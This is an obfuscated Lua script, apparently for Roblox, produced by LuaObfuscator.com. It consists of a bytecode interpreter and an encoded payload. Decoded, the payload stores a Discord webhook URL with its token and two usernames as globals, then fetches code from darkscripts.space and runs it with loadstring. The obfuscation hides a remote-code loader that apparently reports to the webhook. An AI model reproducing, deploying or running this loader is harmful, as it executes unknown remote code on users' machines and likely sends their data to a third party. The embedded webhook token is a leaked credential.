--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.7) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v81=v2(v0(v30,16));if v19 then local v88=0;local v89;while true do if (v88==0) then v89=v5(v81,v19);v19=nil;v88=1;end if (v88==1) then return v89;end end else return v81;end end end);local function v20(v31,v32,v33) if v33 then local v82=0;local v83;while true do if (v82==(0 -0)) then v83=(v31/((5 -(880 -(282 + 595)))^(v32-1)))%((3 -1)^(((v33-(2 -1)) -(v32-(620 -(555 + 64)))) + ((2569 -(1523 + 114)) -(857 + 74)))) ;return v83-(v83%(569 -(367 + 201))) ;end end else local v84=(929 -(214 + 713))^(v32-(1 + 0)) ;return (((v31%(v84 + v84))>=v84) and 1) or (0 + 0) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + 2 + 0 );v18=v18 + (2 -0) ;return (v36 * (1321 -(68 + 997))) + v35 ;end local function v23() local v37,v38,v39,v40=v1(v16,v18,v18 + 3 );v18=v18 + (1274 -(226 + 232 + 812)) ;return (v40 * (73054774 -56277558)) + (v39 * (65653 -(32 + 85))) + (v38 * (251 + 5)) + v37 ;end local function v24() local v41=957 -(892 + 65) ;local v42;local v43;local v44;local v45;local v46;local v47;while true do if (v41==(2 -1)) then v44=1 -0 ;v45=(v20(v43,1 -0 ,(654 -284) -(87 + 263) ) * (2^(212 -(67 + 113)))) + v42 ;v41=2 + 0 ;end if (v41==3) then if (v46==(0 -0)) then if (v45==0) then return v47 * (0 + 0) ;else v46=3 -2 ;v44=952 -(802 + (168 -(10 + 8))) ;end elseif (v46==((5941 -(44 + 386)) -3464)) then return ((v45==(0 -0)) and (v47 * ((1 + 0)/((2483 -(998 + 488)) -((3519 -2604) + 82))))) or (v47 * NaN) ;end return v8(v47,v46-(2896 -1873) ) * (v44 + (v45/((2 + (442 -(416 + 26)))^(68 -(51 -35))))) ;end if (v41==(1189 -(1069 + 118))) then v46=v20(v43,47 -26 ,67 -(12 + 24) );v47=((v20(v43,6 + 26 )==(1 -(0 + 0))) and  -1) or (1 + 0) ;v41=794 -(158 + 210 + 423) ;end if (v41==(0 -0)) then v42=v23();v43=v23();v41=1;end end end local function v25(v48) local v49=0;local v50;local v51;while true do if (v49==1) then v50=v3(v16,v18,(v18 + v48) -(773 -(201 + 571)) );v18=v18 + v48 ;v49=1140 -(116 + 1022) ;end if (v49==(12 -(1 + 8))) then return v6(v51);end if (v49==(2 + 0)) then v51={};for v90=(2 + 1) -2 , #v50 do v51[v90]=v2(v1(v3(v50,v90,v90)));end v49=10 -7 ;end if (v49==((1744 -(261 + 624)) -(814 + 45))) then v50=nil;if  not v48 then v48=v23();if (v48==0) then return "";end end v49=2 -1 ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return 0;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();local v59=(function() return;end)();while true do local v66=(function() return 0 + 0 ;end)();while true do if (v66==1) then if (v52~=2) then else v57[ #"asd"]=(function() return v21();end)();for v98= #"[",v23() do local v99=(function() return 0;end)();local v100=(function() return;end)();while true do if (v99==0) then v100=(function() return v21();end)();if (v20(v100, #",", #"[")==(0 + 0)) then local v166=(function() return 0 + 0 ;end)();local v167=(function() return;end)();local v168=(function() return;end)();local v169=(function() return;end)();while true do if (v166~=(0 + 0)) then else local v175=(function() return 0 + 0 ;end)();local v176=(function() return;end)();while true do if (v175~=0) then else v176=(function() return 0;end)();while true do if (v176==(1 -0)) then v166=(function() return 1 -0 ;end)();break;end if (v176==0) then v167=(function() return v20(v100,2 -0 , #"19(");end)();v168=(function() return v20(v100, #"?id=",1390 -(746 + 638) );end)();v176=(function() return 2 -1 ;end)();end end break;end end end if ((2 + 0)==v166) then if (v20(v168, #"/", #"}")== #",") then v169[2 + 0 ]=(function() return v59[v169[2]];end)();end if (v20(v168,2,2)== #"!") then v169[ #"-19"]=(function() return v59[v169[ #"-19"]];end)();end v166=(function() return 4 -1 ;end)();end if (v166==(399 -(115 + 281))) then if (v20(v168, #"gha", #"xxx")== #"|") then v169[ #"?id="]=(function() return v59[v169[ #"asd1"]];end)();end v54[v98]=(function() return v169;end)();break;end if (1==v166) then v169=(function() return {v22(),v22(),nil,nil};end)();if (v167==(0 + 0)) then local v183=(function() return 0 -0 ;end)();local v184=(function() return;end)();while true do if (v183==(0 -0)) then v184=(function() return 0;end)();while true do if (v184~=(0 + 0)) then else v169[ #"19("]=(function() return v22();end)();v169[ #"0313"]=(function() return v22();end)();break;end end break;end end elseif (v167== #",") then v169[ #"xnx"]=(function() return v23();end)();elseif (v167==(1 + 1)) then v169[ #"19("]=(function() return v23() -(2^(883 -(550 + 317))) ;end)();elseif (v167== #"19(") then local v189=(function() return 0;end)();local v190=(function() return;end)();while true do if (v189==(0 -0)) then v190=(function() return 0 -0 ;end)();while true do if (v190==(0 -0)) then v169[ #"xxx"]=(function() return v23() -((1469 -(899 + 568))^16) ;end)();v169[ #"xnxx"]=(function() return v22();end)();break;end end break;end end end v166=(function() return 2;end)();end end end break;end end end for v101= #"|",v23() do v55,v101,v28=(function() return v53(v55,v101,v28);end)();end return v57;end break;end if (v66~=(0 + 0)) then else if ((2 -1)==v52) then local v97=(function() return 0 -0 ;end)();while true do if ((286 -(134 + 151))~=v97) then else v59=(function() return {};end)();for v135= #"!",v58 do local v136=(function() return 1665 -(970 + 695) ;end)();local v137=(function() return;end)();local v138=(function() return;end)();local v139=(function() return;end)();while true do if (v136==(1 -0)) then v139=(function() return nil;end)();while true do if ((572 -(426 + 146))~=v137) then else local v178=(function() return 1990 -(582 + 1408) ;end)();while true do if (v178==(3 -2)) then v137=(function() return 1 -0 ;end)();break;end if (v178==(0 -0)) then v138=(function() return v21();end)();v139=(function() return nil;end)();v178=(function() return 1825 -(1195 + 629) ;end)();end end end if (v137==(812 -(569 + 242))) then if (v138== #">") then v139=(function() return v21()~=(0 -0) ;end)();elseif (v138==(1 + 1)) then v139=(function() return v24();end)();elseif (v138== #"-19") then v139=(function() return v25();end)();end v59[v135]=(function() return v139;end)();break;end end break;end if (v136==(1024 -(706 + 318))) then local v171=(function() return 0 -0 ;end)();while true do if (v171==(1271 -(945 + 326))) then v137=(function() return 241 -(187 + 54) ;end)();v138=(function() return nil;end)();v171=(function() return 781 -(162 + 618) ;end)();end if (v171==1) then v136=(function() return 1 + 0 ;end)();break;end end end end end v97=(function() return 2 + 0 ;end)();end if (v97~=(3 -1)) then else v52=(function() return 702 -(271 + 429) ;end)();break;end if (v97~=(0 + 0)) then else v57=(function() return {v54,v55,nil,v56};end)();v58=(function() return v23();end)();v97=(function() return 1;end)();end end end if (v52==(1500 -(1408 + 92))) then v53=(function() return function(v102,v103,v104) local v105=(function() return 1086 -(461 + 625) ;end)();local v106=(function() return;end)();while true do if (v105~=(1288 -(993 + 295))) then else v106=(function() return 0 + 0 ;end)();while true do if ((1171 -(418 + 753))==v106) then v102[v103-#"}" ]=(function() return v104();end)();return v102,v103,v104;end end break;end end end;end)();v54=(function() return {};end)();v55=(function() return {};end)();v56=(function() return {};end)();v52=(function() return 1 + 0 ;end)();end v66=(function() return 1637 -(1373 + 263) ;end)();end end end end local function v29(v60,v61,v62) local v63=v60[1];local v64=v60[1 + 1 ];local v65=v60[1 + 2 ];return function(...) local v67=v63;local v68=v64;local v69=v65;local v70=v27;local v71=1 + 0 ;local v72= -(1 + 0);local v73={};local v74={...};local v75=v12("#",...) -(1770 -(1749 + 20)) ;local v76={};local v77={};for v85=0 + 0 ,v75 do if ((4055==4055) and (v85>=v69)) then v73[v85-v69 ]=v74[v85 + (1323 -(1249 + 73)) ];else v77[v85]=v74[v85 + 1 + 0 ];end end local v78=(v75-v69) + 1 ;local v79;local v80;while true do v79=v67[v71];v80=v79[1146 -(466 + 679) ];if (v80<=(11 -6)) then if ((4149<=4445) and (v80<=2)) then if (v80<=(0 -0)) then v77[v79[1902 -(106 + 1794) ]]();elseif (v80==(1 + 0)) then local v140=v79[1 + 1 ];v77[v140]=v77[v140](v13(v77,v140 + (2 -1) ,v72));else local v142=v79[5 -3 ];local v143,v144=v70(v77[v142](v13(v77,v142 + (115 -(4 + (1439 -(797 + 532)))) ,v79[587 -(57 + 527) ])));v72=(v144 + v142) -(1428 -(41 + 1386)) ;local v145=103 -(13 + 4 + 86) ;for v164=v142,v72 do local v165=0 + 0 ;while true do if ((v165==0) or (1818==85)) then v145=v145 + 1 + 0 ;v77[v164]=v143[v145];break;end end end end elseif ((630<2127) and (v80<=(6 -3))) then v62[v79[8 -5 ]]=v77[v79[168 -((286 -164) + 44) ]];elseif (v80>4) then v77[v79[2 -0 ]]=v62[v79[9 -6 ]];else local v148=v79[2 + 0 ];local v149=v77[v79[1 + (1204 -(373 + 829)) ]];v77[v148 + (1 -0) ]=v149;v77[v148]=v149[v79[69 -(30 + 35) ]];end elseif (v80<=(6 + (733 -(476 + 255)))) then if ((v80<=((2393 -(369 + 761)) -(1043 + 214))) or (1938==2514)) then v71=v79[(7 + 4) -8 ];elseif (v80>(1219 -(323 + 889))) then v77[v79[5 -3 ]]=v79[583 -(361 + 219) ];else v62[v79[323 -((96 -43) + (505 -238)) ]]=v77[v79[1 + 1 ]];v71=v71 + (414 -(15 + (636 -(64 + 174)))) ;v79=v67[v71];v77[v79[984 -(18 + 964) ]]=v79[3];v71=v71 + (3 -2) ;v79=v67[v71];v62[v79[2 + 1 ]]=v77[v79[2 + 0 ]];v71=v71 + ((122 + 729) -(20 + 830)) ;v79=v67[v71];v77[v79[2 + 0 ]]=v79[129 -((171 -55) + 10) ];v71=v71 + 1 ;v79=v67[v71];v71=v79[1 + 2 ];end elseif ((4255>=55) and (v80<=(747 -(542 + (532 -(144 + 192)))))) then local v110;local v111,v112;local v113;local v114;v62[v79[6 -3 ]]=v77[v79[1 + 1 ]];v71=v71 + (217 -(42 + 174)) ;v79=v67[v71];v77[v79[2 + 0 + 0 ]]=v62[v79[2 + 1 ]];v71=v71 + 1 ;v79=v67[v71];v77[v79[4 -2 ]]=v62[v79[7 -4 ]];v71=v71 + 1 ;v79=v67[v71];v114=v79[(1287 + 266) -(1126 + 425) ];v113=v77[v79[408 -(118 + 287) ]];v77[v114 + (3 -2) ]=v113;v77[v114]=v113[v79[1125 -(118 + 1003) ]];v71=v71 + (2 -1) ;v79=v67[v71];v77[v79[(162 + 217) -(142 + 235) ]]=v79[13 -10 ];v71=v71 + (1505 -(363 + 1141)) + 0 ;v79=v67[v71];v114=v79[2];v111,v112=v70(v77[v114](v13(v77,v114 + (978 -(553 + 424)) ,v79[5 -2 ])));v72=(v112 + v114) -(1 + 0) ;v110=0 + 0 ;for v132=v114,v72 do v110=v110 + 1 ;v77[v132]=v111[v110];end v71=v71 + 1 + 0 ;v79=v67[v71];v114=v79[1 + 1 ];v77[v114]=v77[v114](v13(v77,v114 + (1581 -(1183 + 397)) ,v72));v71=v71 + 1 ;v79=v67[v71];v77[v79[2 + (0 -0) ]]();v71=v71 + (2 -1) ;v79=v67[v71];v71=v79[7 -4 ];elseif (v80>(22 -12)) then do return;end elseif (v77[v79[1 + 0 + 1 ]]==v79[19 -(12 + 3) ]) then v71=v71 + (1976 -(1913 + 62)) ;else v71=v79[756 -(239 + 324 + 190) ];end v71=v71 + (2 -1) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!0B3O00028O00026O00F03F03073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F31323831392O352O3130323736332O303934332F36345A52486479622O69424E3754666E357A43776344587A42596E35585161732O7965675843594C4F553773586C424B35416C585F2O684C486664335331484377427548030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403193O00682O7470733A2O2F6461726B736372697074732E737061636503083O00557365726E616D65030A3O00682O6F647961726F6E6503093O00557365726E616D653200163O0012083O00013O00260A3O000D000100020004063O000D0001001208000100043O001209000100033O00122O000100053O00122O000200063O00202O00020002000700122O000400086O000200046O00013O00024O00010001000100044O0015000100260A3O0001000100010004063O000100010012080001000A3O001207000100093O00122O0001000A3O00122O0001000B3O00124O00023O00044O000100012O000B3O00017O00",v9(),...);